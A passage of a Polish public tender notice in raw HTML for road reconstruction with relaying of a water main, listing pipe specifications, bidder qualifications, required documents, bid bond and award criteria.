nasieci trójnika redukcyjnego. Zaraz za włączeniem należy zamontować klinowe zasuwy żeliwne doprzyłą-czy domowych np.HAWLE lub równoważne, PN-16 z obudową zakończoną skrzynką uliczną ośrednicach jak na rysunkach profili. Następnie wszystkie projektowane odcinki przyłączywodociągowych należy wykonać z rur polietylenowych PE32x2,9mm i PE63x 5,8mm z tworzywaPE100RC, klasy SDR 11, PN16,spełniających wymogi normy: PN-EN 12201-1-3:2004 . Rury ikształtki polietylenowe należy łączyć metodą zgrzewania elektrooporowego przy za-stosowaniuodpowiednich kształtek. Zmiany kierunku przewodów z tworzyw sztucznych można wykonać stosująckształtki lub wykorzystując właściwość elastyczności rur, uważając by nie przekroczyćdopuszczalnego promienia wygięcia: 50 x Dn. Przewody wodociągowe z rur polietylenowych niewymagają stosowania bloków oporowych przy zmianie kierunku, natomiast wykonać należy blokipodporowe pod armaturę i kształtki wykonane z żeliwa, z uwagi na zróżnicowaną elastyczność igiętkość oraz różny stopień osiadania elementów żeliwnych i z PE. Wodociąg należy układać nagłębokości i ze spadkiem, jak pokazano na profilu. Rury typu PE100 RC nie wymagają stosowaniapodsypki i obsypki piaskowej, niemniej jednak propo-nuje się wykonanie 10 cm podsypki i 20 cmobsypki z materiału sypkiego. Resztę wykopu należy zasypać: -w pasach drogowych ulic i wjazdachoraz terenach utwardzonych- pospółką na pełną głębo-kość z zagęszczeniem warstwami co 20 cm, douzyskania normatywnego wskaźnika za-gęszczenia, -poza drogami gruntem rodzimym również warstwami co 30 cm z kontrolą wskaźnika za-gęszczania gruntu (95% w skali Proctora) zrównoczesnym usuwaniem szalunku. Ponad 100 cm nad licem rury można zagęszczać mechanicznieprzy pomocy średnich i ciężkich urządzeń mechanicznych. Na przyłączu wodociągowym wykonanymz rur PE należy w wykopie nad rurociągiem na wysokości 40-50 cm ułożyć oznakowanie foliąostrzegawczo-sygnalizacyjną o szerokości 20 cm w kolorze biało-niebieskim z wtopioną taśmąmetalową. Uzbrojenie na wodociągu należy oznakować tabliczkami zgodnie z PN-86/B-09700. Całośćwykonać wg normy: PN-B-10725: 1997 .Przewody zewnętrzne. Wymagania i bada-nia. Prace wzakresie przełożenia odcinka sieci wodociągowej z przepięciem przyłączy zwane będą dalej również,,Zakresem Robót na Rzecz SW", podczas gdy pozostałe prace - ,,Za-kresem Robót na Rzecz MZD".II. Szczegółowy zakres robót określają: projekt budowlano-wykonawczy wraz z projektemnieistotnych zmian wprowadzonych przez Projektanta stanowiące integralną część siwz, STWiORBstanowiące integralną część siwz. przedmiar robót stanowiący dokumentację pomocniczą do wycenyzamówienia.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">45233140-2</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45231300-8</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Tak</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst">Zamawiający przewiduje możliwość udzielenia zamówienia, o którym mowa w art. 67 ust. 1 pkt. 6 ustawy PZP, polegającego na powtórzeniu podobnych robót budowlanych. Całkowita wartość tegozamówienia wynosi nie więcej niż 450 000,00 zł.</span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2019-12-20</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">- posiada środki lub zdolność kredytową na kwotę nie mniejszą niż 500000,00 zł; -posiada ubezpieczenie odpowiedzialności cywilnej w zakresie prowadzonej działalnościzwiązanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 500 000,00 zł;</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">-posiada doświadczenie, polegające na wykonaniu w sposób należyty orazzgodnie z przepisami prawa budowlanego i prawidłowo ukończył co najmniej 2 -wie robotybudowlane o podobnym charakterze do robót stanowiących przedmiot zamówienia . Należy prze torozumieć roboty polegające na budowie/przebudowie/rozbudowie/remoncie ulicy/drogi publicznejw technologii porównywalnej o długości co najmniej 300mb każde zamówienie. Za technologięporównywalną Zamawiający uzna minimum ułożenie nawierzchni drogi/ulicy z betonucementowego oraz wykonanie podbudowy z kruszywa -przy realizacji zamówienia będziedysponował osobami zdolnymi do wykonania zamówienia, tj.: o kierownikiem budowy - osobaposiadająca uprawnienia budowlane uprawniające do pełnienia samodzielnych funkcjitechnicznych w budownictwie zgodnie z Ustawą z dnia 7 lipca 1994 r. Prawo budowlane (t. j. Dz.U. 2016 poz. 290 z późn. zm.) oraz Rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11września 2014r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. 2014 poz.1278) w specjalności drogowej bez ograniczeń. Zamawiający dopuszcza kwalifikacje równoważnedo w/w, zdobyte w innych państwach na zasadach określonych w art. 12a ustawy z dnia 7 lipca1994 r. Prawo budowlane (tekst jedn. Dz. U. 2016 poz. 290). - przy realizacji zamówienia będziedysponował niezbędnymi do wykonania zamówienia narzędziami, wyposażeniem zakładu iurządzeniami; - spycharka gąsienicowa - min. 1 sztuka - koparka gąsienicowa- min. 1 sztuka -równiarka samojezdna - min. 1 sztuka - walec samojezdny - min. 2 sztuki</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Tak</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 5 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 6 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 7 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">1) zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca niezalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminuskładania ofert lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie zwłaściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkamilub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lubrozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwegoorganu; 2) zaświadczenia właściwej terenowej jednostki organizacyjnej Zakładu UbezpieczeńSpołecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentupotwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lubzdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lubinnego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem wsprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególnościuzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lubwstrzymanie w całości wykonania decyzji właściwego organu; 3) odpisu z właściwego rejestru lubz centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagająwpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art.24 ust. 5 pkt. 1 ustawy; 4) oświadczenia wykonawcy o braku orzeczenia wobec niego tytułemśrodka zapobiegawczego zakazu ubiegania się o zamówienie publiczne, zgodnie ze wzoremstanowiącym załącznik nr 5; 5) oświadczenia wykonawcy o braku wydania wobec niegoprawomocnego wyroku sądu skazującego za wykroczenie na karę ograniczenia wolności lubgrzywny w zakresie określonym w rozdziale VI ust. 4 i 5 SIWZ, zgodnie ze wzorem stanowiącymzałącznik nr 6; 6) oświadczenia wykonawcy o braku wydania wobec niego ostatecznej decyzjiadministracyjnej o naruszeniu obowiązków wynikających z przepisów prawa pracy, prawa ochronyśrodowiska lub przepisów o zabezpieczeniu społecznym, w zakresie określonym w rozdziale VIust. 6 SIWZ, zgodnie ze wzorem stanowiącym załącznik nr 7; 7) oświadczenia wykonawcy oniezaleganiu z opłacaniem podatków i opłat lokalnych, o których mowa w ustawie z dnia 12stycznia 1991r. o podatkach i opłatach lokalnych (Dz. U. z 2018r., poz. 1445 z późn. zm.), zgodnieze wzorem stanowiącym załącznik nr 8; 8) oświadczenia wykonawcy o przynależności lub brakuprzynależności do tej samej grupy kapitałowej, zgodnie ze wzorem stanowiącym załącznik nr 9; wprzypadku przynależności do tej samej grupy kapitałowej wykonawca może złożyć wraz zoświadczeniem dokumenty bądź inne informacje potwierdzające, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu.</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">2) w zakresie sytuacji ekonomicznej lub finansowej: 1.2.a) dokument potwierdzający, zewykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalnościzwiązanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 500 000,00 zł; 3) wzakresie zdolności technicznej lub zawodowej: 1.3.a) wykaz robót budowlanych zgodnych zwarunkiem udziału w postępowaniu, wykonanych nie wcześniej niż w okresie 5 lat przed upływemterminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,zgodnie ze wzorem stanowiącym załącznik nr 2, z załączeniem dowodów określających, czy teroboty budowlane zostały wykonane należycie, w szczególności informacji o tym, czy robotyzostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone. Dowodami,o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz któregoroboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnymcharakterze wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty; 1.3.b)wykaz osób, którymi wykonawca będzie dysponował przy realizacji zamówienia, zgodnie zewzorem stanowiącym załącznik nr 3. 1.3.c) wykaz narzędzi , wyposażenia zakładu i urządzeńtechnicznych zgodnie ze wzorem stanowiącym załącznik nr 3a.</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">1. Przystępując do przedmiotowego postępowania wykonawca zobowiązany jest do wniesieniawadium w wysokości 20 000,00 zł. 2. Wadium może zostać wniesione w jednej lub kilkunastępujących formach: 1) pieniądzu; 2) poręczeniach bankowych lub poręczeniach spółdzielczejkasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniempieniężnym; 3) gwarancjach bankowych; 4) gwarancjach ubezpieczeniowych; 5) poręczeniachudzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada2000r. o utworzeniu Polskiej Agencji Przedsiębiorczości (t. j. Dz. U z 2019r. poz. 310). 3. Wadiumnależ wnieść przed upływem terminu składania ofert.</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>okres udzielonej gwarancji jakości na wykonane roboty budowlane</TD><TD style='border: 1px solid black;border-collapse: collapse;'>30,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>doświadczenie kierownika budowy</TD><TD style='border: 1px solid black;border-collapse: collapse;'>10,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do 